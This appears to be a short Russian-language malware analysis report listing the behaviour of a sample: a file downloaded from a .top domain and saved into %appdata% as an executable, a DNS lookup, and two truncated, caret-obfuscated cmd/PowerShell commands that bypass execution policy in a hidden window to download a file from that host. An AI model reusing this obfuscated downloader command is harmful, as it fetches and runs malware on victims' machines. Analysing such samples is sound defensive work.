Техническая информация
- http://folueopa.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "powE^RshE^ll^.^eX^e^ -^Exe^cuT^IoNPoLiCY ^B^y^p^ASS ^-^nOP^R^oF^iL^E -Win^D^ow^StYlE^ Hi^D^dE^N ^(^neW-^objeCT sYste^M.NeT^.w^E^bCLI^e^nT^)^.^DO^W^N^LO^ADfIlE^(^'http://folu...
- DNS ASK fo###opa.top
- '<SYSTEM32>\cmd.exe' /C "powE^RshE^ll^.^eX^e^ -^Exe^cuT^IoNPoLiCY ^B^y^p^ASS ^-^nOP^R^oF^iL^E -Win^D^ow^StYlE^ Hi^D^dE^N ^(^neW-^objeCT sYste^M.NeT^.w^E^bCLI^e^nT^)^.^DO^W^N^LO^ADfIlE^(^'http://folu...' (со скрытым окном)